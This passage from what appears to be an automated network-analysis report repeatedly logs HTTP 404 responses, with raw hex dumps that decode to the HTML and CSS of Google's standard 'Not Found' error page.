6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:17:13 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:17:15 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:17:17 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:17:19 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:17:19 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:17:19 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 